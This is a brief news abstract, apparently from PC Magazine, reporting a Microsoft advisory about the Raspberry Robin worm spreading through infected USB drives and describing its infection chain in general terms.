A private threat intelligence advisory issued by Microsoft warns that hundreds of Windows networks are infected with the Raspberry Robin worm.
The worm is spread through infected USB devices. After the user inserts the USB device and clicks the malicious .LNK file, the worm launches an msiexec process and runs a malicious file located on the device.
A short URL is then used to establish a connection with a command and control server, potentially including QNAP NAS devices, which is followed by the download and installation of several malicious dynamic link libraries (DLLs).
The DLLs are executed using the legitimate Windows utility odbcconf.exe as the worm attempts to connect to Tor network nodes.
The actor behind Raspberry Robin has not yet taken advantage of any infected Windows networks, so the goal of the worm remains unknown.
From PC Magazine
View Full Article
Abstracts Copyright © 2022 SmithBucklin, Washington, DC, USA